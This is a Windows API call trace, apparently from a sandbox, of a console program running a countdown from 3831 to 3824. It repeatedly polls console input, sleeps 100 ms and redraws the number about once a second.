[0255.163] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0255.163] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6059
[0255.163] Sleep (dwMilliseconds=0x64)
[0255.272] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0255.272] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6059
[0255.272] Sleep (dwMilliseconds=0x64)
[0255.381] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0255.381] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6059
[0255.381] Sleep (dwMilliseconds=0x64)
[0255.490] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0255.490] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605a
[0255.490] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083831") returned 8
[0255.490] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0255.491] __iob_func () returned 0x757a2900
[0255.491] _fileno (_File=0x757a2920) returned 1
[0255.491] _errno () returned 0x5507d8
[0255.491] _get_osfhandle (_FileHandle=1) returned 0x4c
[0255.491] _errno () returned 0x5507d8
[0255.491] GetFileType (hFile=0x4c) returned 0x2
[0255.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0255.491] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0255.491] lstrlenW (lpString="\x08\x08\x08\x083831") returned 8
[0255.599] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0255.600] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605a
[0255.600] Sleep (dwMilliseconds=0x64)
[0255.709] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0255.709] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605a
[0255.709] Sleep (dwMilliseconds=0x64)
[0255.818] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0255.818] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605a
[0255.818] Sleep (dwMilliseconds=0x64)
[0255.927] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0255.927] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605a
[0255.927] Sleep (dwMilliseconds=0x64)
[0256.036] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0256.036] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605a
[0256.036] Sleep (dwMilliseconds=0x64)
[0256.145] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0256.146] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605a
[0256.146] Sleep (dwMilliseconds=0x64)
[0256.255] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0256.255] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605a
[0256.255] Sleep (dwMilliseconds=0x64)
[0256.364] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0256.364] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605a
[0256.364] Sleep (dwMilliseconds=0x64)
[0256.473] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0256.473] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605b
[0256.473] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083830") returned 8
[0256.473] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0256.473] __iob_func () returned 0x757a2900
[0256.473] _fileno (_File=0x757a2920) returned 1
[0256.474] _errno () returned 0x5507d8
[0256.474] _get_osfhandle (_FileHandle=1) returned 0x4c
[0256.474] _errno () returned 0x5507d8
[0256.474] GetFileType (hFile=0x4c) returned 0x2
[0256.474] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0256.474] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0256.474] lstrlenW (lpString="\x08\x08\x08\x083830") returned 8
[0256.582] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0256.583] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605b
[0256.583] Sleep (dwMilliseconds=0x64)
[0256.691] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0256.692] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605b
[0256.692] Sleep (dwMilliseconds=0x64)
[0256.801] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0256.801] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605b
[0256.801] Sleep (dwMilliseconds=0x64)
[0256.910] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0256.910] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605b
[0256.910] Sleep (dwMilliseconds=0x64)
[0257.019] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0257.019] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605b
[0257.019] Sleep (dwMilliseconds=0x64)
[0257.128] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0257.129] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605b
[0257.129] Sleep (dwMilliseconds=0x64)
[0257.237] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0257.238] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605b
[0257.238] Sleep (dwMilliseconds=0x64)
[0257.347] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0257.347] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605b
[0257.347] Sleep (dwMilliseconds=0x64)
[0257.456] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0257.456] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0257.456] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083829") returned 8
[0257.456] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0257.456] __iob_func () returned 0x757a2900
[0257.456] _fileno (_File=0x757a2920) returned 1
[0257.456] _errno () returned 0x5507d8
[0257.456] _get_osfhandle (_FileHandle=1) returned 0x4c
[0257.456] _errno () returned 0x5507d8
[0257.457] GetFileType (hFile=0x4c) returned 0x2
[0257.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0257.457] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0257.457] lstrlenW (lpString="\x08\x08\x08\x083829") returned 8
[0257.565] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0257.565] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0257.565] Sleep (dwMilliseconds=0x64)
[0257.674] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0257.674] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0257.675] Sleep (dwMilliseconds=0x64)
[0257.783] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0257.784] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0257.784] Sleep (dwMilliseconds=0x64)
[0257.893] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0257.893] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0257.893] Sleep (dwMilliseconds=0x64)
[0258.002] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.002] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0258.002] Sleep (dwMilliseconds=0x64)
[0258.114] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.114] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0258.114] Sleep (dwMilliseconds=0x64)
[0258.230] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.230] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0258.230] Sleep (dwMilliseconds=0x64)
[0258.329] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.330] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0258.330] Sleep (dwMilliseconds=0x64)
[0258.439] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.439] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605c
[0258.439] Sleep (dwMilliseconds=0x64)
[0258.548] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.548] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605d
[0258.548] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083828") returned 8
[0258.548] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0258.548] __iob_func () returned 0x757a2900
[0258.548] _fileno (_File=0x757a2920) returned 1
[0258.548] _errno () returned 0x5507d8
[0258.548] _get_osfhandle (_FileHandle=1) returned 0x4c
[0258.548] _errno () returned 0x5507d8
[0258.548] GetFileType (hFile=0x4c) returned 0x2
[0258.548] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0258.549] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0258.549] lstrlenW (lpString="\x08\x08\x08\x083828") returned 8
[0258.657] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.657] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605d
[0258.657] Sleep (dwMilliseconds=0x64)
[0258.766] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.766] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605d
[0258.767] Sleep (dwMilliseconds=0x64)
[0258.876] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.876] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605d
[0258.876] Sleep (dwMilliseconds=0x64)
[0258.985] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0258.985] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605d
[0258.985] Sleep (dwMilliseconds=0x64)
[0259.100] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0259.100] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605d
[0259.100] Sleep (dwMilliseconds=0x64)
[0259.203] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0259.203] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605d
[0259.203] Sleep (dwMilliseconds=0x64)
[0259.312] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0259.313] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605d
[0259.313] Sleep (dwMilliseconds=0x64)
[0259.421] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0259.422] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605d
[0259.422] Sleep (dwMilliseconds=0x64)
[0259.531] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0259.531] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605e
[0259.531] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083827") returned 8
[0259.531] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0259.531] __iob_func () returned 0x757a2900
[0259.531] _fileno (_File=0x757a2920) returned 1
[0259.531] _errno () returned 0x5507d8
[0259.531] _get_osfhandle (_FileHandle=1) returned 0x4c
[0259.531] _errno () returned 0x5507d8
[0259.531] GetFileType (hFile=0x4c) returned 0x2
[0259.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0259.531] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0259.531] lstrlenW (lpString="\x08\x08\x08\x083827") returned 8
[0259.640] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0259.640] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605e
[0259.640] Sleep (dwMilliseconds=0x64)
[0259.749] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0259.749] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605e
[0259.749] Sleep (dwMilliseconds=0x64)
[0259.858] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0259.859] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605e
[0259.859] Sleep (dwMilliseconds=0x64)
[0259.998] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0259.999] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605e
[0259.999] Sleep (dwMilliseconds=0x64)
[0260.139] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0260.139] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605e
[0260.139] Sleep (dwMilliseconds=0x64)
[0260.279] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0260.280] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605e
[0260.280] Sleep (dwMilliseconds=0x64)
[0260.420] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0260.420] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605e
[0260.420] Sleep (dwMilliseconds=0x64)
[0260.560] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0260.560] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605f
[0260.560] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083826") returned 8
[0260.560] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0260.560] __iob_func () returned 0x757a2900
[0260.560] _fileno (_File=0x757a2920) returned 1
[0260.560] _errno () returned 0x5507d8
[0260.560] _get_osfhandle (_FileHandle=1) returned 0x4c
[0260.560] _errno () returned 0x5507d8
[0260.560] GetFileType (hFile=0x4c) returned 0x2
[0260.561] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0260.561] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0260.561] lstrlenW (lpString="\x08\x08\x08\x083826") returned 8
[0260.700] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0260.701] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605f
[0260.701] Sleep (dwMilliseconds=0x64)
[0260.841] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0260.841] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605f
[0260.841] Sleep (dwMilliseconds=0x64)
[0261.028] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0261.028] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605f
[0261.028] Sleep (dwMilliseconds=0x64)
[0261.184] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0261.184] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605f
[0261.184] Sleep (dwMilliseconds=0x64)
[0261.313] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0261.313] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd605f
[0261.313] Sleep (dwMilliseconds=0x64)
[0261.480] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0261.481] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6060
[0261.481] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083825") returned 8
[0261.481] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0261.481] __iob_func () returned 0x757a2900
[0261.481] _fileno (_File=0x757a2920) returned 1
[0261.481] _errno () returned 0x5507d8
[0261.481] _get_osfhandle (_FileHandle=1) returned 0x4c
[0261.481] _errno () returned 0x5507d8
[0261.481] GetFileType (hFile=0x4c) returned 0x2
[0261.481] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0261.481] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0261.481] lstrlenW (lpString="\x08\x08\x08\x083825") returned 8
[0261.654] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0261.654] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6060
[0261.654] Sleep (dwMilliseconds=0x64)
[0261.793] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0261.793] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6060
[0261.793] Sleep (dwMilliseconds=0x64)
[0261.934] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0261.934] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6060
[0261.934] Sleep (dwMilliseconds=0x64)
[0262.075] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0262.075] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6060
[0262.075] Sleep (dwMilliseconds=0x64)
[0262.225] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0262.225] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6060
[0262.225] Sleep (dwMilliseconds=0x64)
[0262.354] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0262.354] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6060
[0262.354] Sleep (dwMilliseconds=0x64)
[0262.495] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0262.495] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6061
[0262.495] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083824") returned 8
[0262.495] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0262.495] __iob_func () returned 0x757a2900
[0262.495] _fileno (_File=0x757a2920) returned 1
[0262.495] _errno () returned 0x5507d8
[0262.495] _get_osfhandle (_FileHandle=1) returned 0x4c
[0262.495] _errno () returned 0x5507d8
[0262.495] GetFileType (hFile=0x4c) returned 0x2
[0262.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0262.495] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0262.495] lstrlenW (lpString="\x08\x08\x08\x083824") returned 8
[0262.635] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
